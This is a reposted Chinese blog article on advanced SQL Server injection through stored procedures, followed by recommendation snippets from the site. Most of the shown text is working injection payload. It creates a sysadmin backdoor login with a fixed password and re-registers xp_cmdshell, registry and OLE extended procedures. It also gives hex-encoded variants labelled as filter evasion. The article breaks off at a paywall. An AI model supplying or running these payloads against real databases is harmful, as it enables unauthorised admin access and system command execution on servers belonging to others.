SQL高级注入使用之储存过程

最新推荐文章于 2021-02-08 06:48:50 发布
最新推荐文章于 2021-02-08 06:48:50 发布
阅读量1.7k 收藏
点赞数
分类专栏: SQL 技术 文章标签: sql c null xp shell output
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yatere/article/details/6359482
版权
本文探讨了SQL高级注入技术,重点是利用储存过程进行攻击的方法,包括添加SA用户、恢复存储过程和利用存储过程执行系统命令。通过示例展示了如何执行SQL命令以获取或增加权限,如`xp_cmdshell`的启用与滥用,以及如何防御这些攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

      =====================================
                 =====SQL高级注入使用之储存过程 ====== 
                 =====================================


转载注来自:http://itpro.blog.163.com 
本人前几年整理的,后来一朋友要传给他了,我也贴出来供大家研究使用。
---------------
-- 添加SA用户--
---------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
1、exec master.dbo.sp_addlogin itpro;
2、exec master.dbo.sp_addsrvrolemember itpro,sysadmin

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
防注入 sa:itpro pass:itpro
declare @s varchar(4000) set @s=cast(0x65786563206d61737465722e64626f2e73705f6164646c6f67696e20697470726f as varchar(4000));exec(@s); declare @c varchar(4000) set @c=cast(0x65786563206d61737465722e64626f2e73705f70617373776f7264206e756c6c2c697470726f2c697470726f as varchar(4000));exec(@c); declare @a varchar(4000) set @a=cast(0x65786563206d61737465722e64626f2e73705f616464737276726f6c656d656d6265722027697470726f272c2073797361646d696e as varchar(4000));exec(@a);-- and 1=1

一、

--------------
-恢复存储过程-
--------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
use master
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
exec sp_dropextendedproc "xp_cmdshell"
exec sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
exec sp_dropextendedproc 'xp_cmdshell'
exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
恢复cmdshell防注入
============================================================
declare @a varchar(255),@b varchar(255),@c varchar(255);
set @a=0x6D61737465722E2E73705F616464657874656E64656470726F63;
set @b=0x78705F636D647368656C6C;
set @c=0x78706C6F6737302E646C6C;
exec @a @b,@c
============================================================
恢复所有过程====
================
declare @s varchar(4000) set @s=cast(0x657865632073705F616464657874656E64656470726F63202778705F636D647368656C6C272C27787077656237302E646C6C273B20657865632073705F616464657874656E64656470726F632078705F646972747265652C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F656E756D67726F7570732C2778706C6F6737302E646C6C273B20657865632073705F616464657874656E64656470726F632078705F66697865646472697665732C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F6C6F67696E636F6E6669672C2778706C6F6737302E646C6C273B20657865632073705F616464657874656E64656470726F632078705F656E756D6572726F726C6F67732C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F67657466696C6564657461696C732C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632073705F4F414372656174652C276F64736F6C6537302E646C6C273B20657865632073705F616464657874656E64656470726F632073705F4F4144657374726F792C276F64736F6C6537302E646C6C273B20657865632073705F616464657874656E64656470726F632073705F4F414765744572726F72496E666F2C276F64736F6C6537302E646C6C273B20657865632073705F616464657874656E64656470726F632073705F4F4147657450726F70657274792C276F64736F6C6537302E646C6C273B20657865632073705F616464657874656E64656470726F632073705F4F414D6574686F642C276F64736F6C6537302E646C6C273B20657865632073705F616464657874656E64656470726F632073705F4F4153657450726F70657274792C276F64736F6C6537302E646C6C273B20657865632073705F616464657874656E64656470726F632073705F4F4153746F702C276F64736F6C6537302E646C6C273B20657865632073705F616464657874656E64656470726F632078705F7265676164646D756C7469737472696E672C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F72656764656C6574656B65792C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F72656764656C65746576616C75652C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F726567656E756D76616C7565732C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F726567726561642C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F72656772656D6F76656D756C7469737472696E672C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F72656777726974652C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F617661696C61626C656D656469612C277870737461722E646C6C27 as varchar(4000));exec(@s);
============================================================
二、

----------------------------------
--恢复sp_addextendedproc存储过程--
----------------------------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

最低0.47元/天 解锁文章
20个代码生成框架
12-22 5468
1.1 CodeSmith 一款人气很旺国外的基于模板的dotnet代码生成器 官方网站:http://www.codesmithtools.com 官方论坛:http://forum.codesmithtools.com/default.aspx 版权形式:30天试用 开源:否 需要先注册确认后才能下载 1.2 MyGenerator MyGenerator是又一个国外...
SQL注入语句和方法总结
叮当大猫猫
09-29 6809
一、SQL语法基础 SQL语法基础和Oracle注入技巧 https://pan.baidu.com/s/11EOTJ8nHrHqimF8nJJTDvA 提取码:4zep 二、SQL手工注入语句 1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.判断数据库系统 ;and (select count() from sysobjects)>0 mssql ;and (select count() from msysobjects)&gt
操作SQLSERVERAGENT服务的扩展存储过程.sql
weixin_30532973的博客
06-02 152
--1. 查询SQLSERVERAGENT服务的当前状态。EXEC master.dbo.xp_servicecontrol N'QUERYSTATE', N'SQLSERVERAGENT' --2. 启动或者停止SQLSERVERAGENT服务。--启动 SQLSERVERAGENT 服务EXEC master.dbo.xp_servicecontrol N'START', N'SQLSERV...
是无效登录名或您没有相应的权限_用SQL语句实现授予登录名系统权限
weixin_31309419的博客
01-27 3522
首先来建立一个登录名TTT:CREATE LOGIN TTT WOTH PASSWORD='123456'再授TTTsysadmin权限,语句为:EXEC master.dbo.sp_addsrvrolemember'用户名','sysadmin'不能授予角色sysadmin权限...
mysql存储过程 sql注入_pymysql如何解决sql注入问题深入讲解
weixin_39629780的博客
02-08 813
1. SQL 注入SQL 注入是非常常见的一种网络攻击方式,主要是通过参数来让 mysql 执行 sql 语句时进行预期之外的操作。即:因为传入的参数改变SQL的语义,变成了其他命令,从而操作了数据库。产生原因:SQL语句使用了动态拼接的方式。例如,下面这段代码通过获取用户信息来校验用户权限:import pymysqlsql = 'SELECT count(*) as count FROM us...
SQL数据库的高级sql注入的一些知识
12-15
[概 要] 这篇文章讨论常用的”sql注入”技术的细节,应用于流行的Ms IIS/ASP/SQL-Server平台。这里探讨有关这种攻击各种可以注入程序访问数据和数据库防范的方法。这篇文章面向两种读者:一是基于数据库web程序开发...
SQL高级注入技术详解
"这是一份关于MS SQL Server高级注入技术的笔记,涵盖了利用系统对象、存储过程以及危险的XP扩展存储过程进行SQL注入攻击的方法。笔记中提到了多个系统表,如sysobjects、sysindexes、syscolumns等,用于获取数据库...
寻找sql注入的网站的方法(必看)
09-09
4. **使用存储过程**:虽然不是绝对安全,但存储过程可以限制攻击者对数据库的直接访问。 5. **最小权限原则**:为应用程序数据库连接分配最小必要的权限,避免因权限过高导致的安全问题。 6. **更新和补丁**:...
42个著名搜索引擎免费登陆入口大全
热门推荐
_FINEFLY_
10-17 10万+
我试了一下,大部分可以登陆,想提高访问量的朋友可以去看看中国论坛之家登陆入口http://www.vt123.com/link.html商情168搜索引擎免费登陆入口http://search.168yx.com/add.php中国搜索同盟免费登录入口 http://service.chinasearch.com.c ... e/free_protocol.htm百度免费登录入口 http://w
百胜 bs3000+ 更改款式 尺码的SQL语句
cyuyan的专栏
04-06 3573
<br /> select  TOP 100 PERCENT SPGG1.SPDM as SPDM, SPGG1.GGDM as GGDM, GUIGE1.GGDM as  GGDM_SUB, GUIGE1.GGMC as  GGMC_SUB, SPGG1.BYZD1 as BYZD1 from SPGG1 as SPGG1, GUIGE1 as GUIGE1 where SPGG1.GGDM =  GUIGE1.GGDM and SPDM = 'Q122410238A'<br />go<br /><br
使用SQL Server Profiler对数据库进行监控和优化
weixin_34357928的博客
01-07 230
SQL Server Profiler是MS Sql 的性能监控工具,可以利用此工具找到需要优化的Sql语句,然后利用数据库引擎优化顾问工具,帮忙优化数据库。 SQL Server Profiler使用方法     我们单击开始--程序--Microsoft SQL Server 2005--性能工具--SQL Server Profiler   如下图     然后会出...
SQL Server代理警报
a86793222的博客
05-24 250
使用SQL Server代理警报的前提条件1、创建操作员,接收消息的用户2、创建警报,满足某种条件触发警报,并作出响应(执行作业或/和通知操作员)3、配置数据库邮件,用于发送消息通知4、SQL Server代理->属性->警报系统->启用邮件配置文件,选择对应的邮件系统及配置文件详细配置步骤请参考SQL Server代理警报和操作员和SQL Server代理配置数据库邮...
“拒绝了对对象数据库的 EXECUTE 权限”之解决
zhdd1234的专栏
12-01 1万+
“拒绝了对对象aspnet_CheckSchemaVersion的 EXECUTE 权限”之解决【错误状态】“/XXX”应用程序中的服务器错误。--------------------------------------------------------------------------------拒绝了对对象 aspnet_CheckSchemaVersion (数据
数据库的规模对select语句的效率影响有多大?
daywait的专栏
04-16 1770
    今天跟同学为了一个问题争了好久,现在越来越能够享受争论的乐趣了,不会像以前一样带入太多的个人情绪,更能够客观的看待问题本身了。他的观点是当一个数据库规模不断增大时,查询同样条数的select语句查询的效率会越来越低,举个例子:一个数据库总共有1W数据时取一千数据跟数据库总用有1000W时取一午数据的查询时间会差别非常大,他认为会严重影响到用户体验,而我认为影响不会太大。为了确定到底谁的观点
Select * From master.dbo.sysdatabases 查询本数据库信息
milijiangjun的博客
06-27 3174
转载自:https://blog.youkuaiyun.com/Aug0st/article/details/42241255Sysobjects:SQL-SERVER的每个数据库内都有此系统表,它存放该数据库内创建的 所有对象,如约束、默认值、日志、规则、存储过程等,每个对象在表中占一行。 对象类型(xtype)。可以是下列对象类型中的一种: C = CHECK 约束 D = 默认值或 DEFAULT 约束...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值